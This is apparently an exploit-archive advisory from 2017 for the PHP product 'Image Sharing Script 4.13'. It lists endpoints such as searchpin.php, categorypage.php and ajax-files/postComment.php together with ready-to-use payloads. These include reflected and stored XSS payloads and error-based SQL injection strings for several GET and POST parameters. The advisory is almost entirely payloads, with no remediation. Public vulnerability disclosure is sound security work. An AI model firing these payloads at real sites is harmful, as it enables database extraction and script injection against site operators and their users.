Image Sharing Script 4.13 - Multiple Vulnerabilities

Author: Hasan Emre Ozer
type: webapps
platform: php
port: 
date_added: 2017-01-16 
date_updated: 2017-01-16 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork :    -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Sofware Price and Demo : $1250
http://photo-sharing.itechscripts.com/

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH

--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>

-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH